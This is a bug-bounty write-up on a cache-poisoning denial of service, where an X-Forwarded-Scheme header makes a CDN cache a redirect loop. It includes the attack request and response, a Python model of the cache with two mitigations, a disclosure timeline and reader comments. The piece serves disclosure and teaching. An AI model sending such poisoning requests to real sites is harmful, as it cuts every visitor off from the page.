
How I Made $16,500 Hacking CDN Caching Servers — Part 3

bombon · Published in InfoSec Write-ups · 2 min read · Jan 29, 2022

Cache Poisoning DoS Via X-Forwarded-Scheme Header

Bounty: 3,000

I didn't know this was a thing until I saw @iustinBB's blog post about their research on cache poisoning, Cache Poisoning at Scale.

Sending the x-forwarded-scheme: http header would result in a 301 redirect to the same location. If that response was cached by a CDN, every later visitor would receive the redirect to the very URL they had just requested, causing a redirect loop and effectively denying access to the file.

I quickly remembered a private program's asset that was fronted by caching servers and built on Ruby on Rails.

Request:

GET /?xxx HTTP/2 
Host: Redacted
X-Forwarded-Scheme: http
...

If you test this, you should always use a "cache buster" (?anything=x); in this case I used (?xxx) so I didn't mistakenly poison the response served to other users.

Response:

HTTP/2 301 Moved Permanently 
Date: Wed, 19 Jan 2022 17:16:13 GMT
Content-Type: text/html
Location: Redacted
Via: 1.1 vegur
Cf-Cache-Status: HIT
Age: 3

If an attacker timed the cache server and poisoned https://redacted/, the user's response when requesting https://redacted/ would be:

HTTP/2 301 Moved Permanently
Cf-Cache-Status: HIT

They won't be able to access https://redacted/, because the 301 redirect the attacker got stored in the cache is served to everyone, and the page would not load until the cache entry expires.
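To make the mechanism concrete, here is a small model of a CDN edge cache in front of an origin that trusts X-Forwarded-Scheme. It is an added example written for this page, not the author's or the program's code; the host name is a placeholder, the cache keying and cacheable-status rules are simplified assumptions about typical CDN behaviour, and the `strip_forwarded_headers` option and `origin_no_store_redirect` function are hypothetical mitigations. It shows the redirect being pinned into the shared cache, why the `?xxx` cache buster keeps the real page untouched during testing, and two ways to close the hole: the edge discarding client-supplied `X-Forwarded-*` headers, or the origin marking the redirect `no-store`.

```python
"""Toy model of a CDN edge in front of an origin that trusts X-Forwarded-Scheme.
Constructed example for this write-up, not the author's or the program's code;
the host name is a placeholder."""

from dataclasses import dataclass

ORIGIN_HOST = "redacted.example"  # placeholder for the redacted host


@dataclass
class Response:
    status: int
    headers: dict
    body: str = ""


def origin_trusting_header(path, headers):
    """Origin behaviour the write-up describes: a client-supplied
    X-Forwarded-Scheme other than https triggers a 301 to the same location."""
    scheme = headers.get("x-forwarded-scheme", "https").lower()
    if scheme != "https":
        return Response(301, {"Location": f"https://{ORIGIN_HOST}{path}"})
    return Response(200, {"Content-Type": "text/html"}, "<h1>ok</h1>")


def origin_no_store_redirect(path, headers):
    """Origin-side mitigation (hypothetical): same redirect logic, but the 301
    is marked no-store so a shared cache will not keep it."""
    resp = origin_trusting_header(path, headers)
    if resp.status == 301:
        resp.headers["Cache-Control"] = "no-store"
    return resp


class EdgeCache:
    """Shared cache keyed on host + path + query only, the way a CDN keys
    responses that carry no Vary header. Request headers are not part of the
    key, which is exactly why one unusual header can poison the entry for everyone."""

    CACHEABLE_STATUSES = {200, 301, 302}  # assumed CDN default

    def __init__(self, origin, strip_forwarded_headers=False):
        self.origin = origin
        self.strip_forwarded_headers = strip_forwarded_headers
        self.store = {}

    def fetch(self, path_with_query, headers=None):
        """Return (Response, cache_status) where cache_status is 'HIT' or 'MISS'."""
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        key = (ORIGIN_HOST, path_with_query)
        if key in self.store:
            return self.store[key], "HIT"
        if self.strip_forwarded_headers:
            # Edge-side mitigation (hypothetical): drop forwarding headers supplied
            # by the client and set them from what the edge knows about the connection.
            headers = {k: v for k, v in headers.items() if not k.startswith("x-forwarded-")}
            headers["x-forwarded-scheme"] = "https"
        resp = self.origin(path_with_query, headers)
        cacheable = resp.status in self.CACHEABLE_STATUSES
        if "no-store" in resp.headers.get("Cache-Control", ""):
            cacheable = False
        if cacheable:
            self.store[key] = resp
        return resp, "MISS"


def poisoning_scenario(edge):
    """One request carrying the header, then a clean request for the same URL.
    Returns (first_status, clean_status, clean_cache_status)."""
    first, _ = edge.fetch("/?xxx", {"X-Forwarded-Scheme": "http"})
    clean, state = edge.fetch("/?xxx")
    return first.status, clean.status, state


def cache_buster_isolates(edge):
    """After poisoning /?xxx, is the real page / still served fresh from origin?"""
    poisoning_scenario(edge)
    resp, state = edge.fetch("/")
    return resp.status == 200 and state == "MISS"


if __name__ == "__main__":
    print("vulnerable      :", poisoning_scenario(EdgeCache(origin_trusting_header)))
    print("edge strips     :", poisoning_scenario(EdgeCache(origin_trusting_header, True)))
    print("origin no-store :", poisoning_scenario(EdgeCache(origin_no_store_redirect)))
    print("cache buster kept / clean:", cache_buster_isolates(EdgeCache(origin_trusting_header)))
```

In the vulnerable configuration the clean second request comes back as a cached 301, which is the Cf-Cache-Status: HIT shown in the write-up; with either mitigation the clean request gets the 200 page. The cache-buster check is the reason the author tested on ?xxx rather than on the bare URL.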

Timeline:

Reported → January 19, 2022

Pending Program Review → January 25, 2022

Triaged → January 25, 2022

Bounty Awarded → January 26, 2022

The total for these 3 reports was $11,300.

I chose only these 3 reports because they were the highest-awarded ones.

I applied the same methodology on other programs, including Cache Deception issues like #1343086,

making a total of $15,400 on HackerOne and $1,100 on BugCrowd.

Thanks for Reading!

Make sure to follow me on Twitter ;)

@bxmbn


Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Responses (3)


Hello bro, may I ask how you identified that the website is using caching servers?

--

Hi, I enjoyed reading this write-up.
I have a question:
I don't understand what
"cache busters" (?anything=x) means.
I searched Google and it says cache busters set the cookie.
Is that correct?...

--

Wow, this was a lot of help.
I found the following response on a target:
Cf-Cache-Status: HIT
Does it mean that it's vulnerable to cache poisoning?

--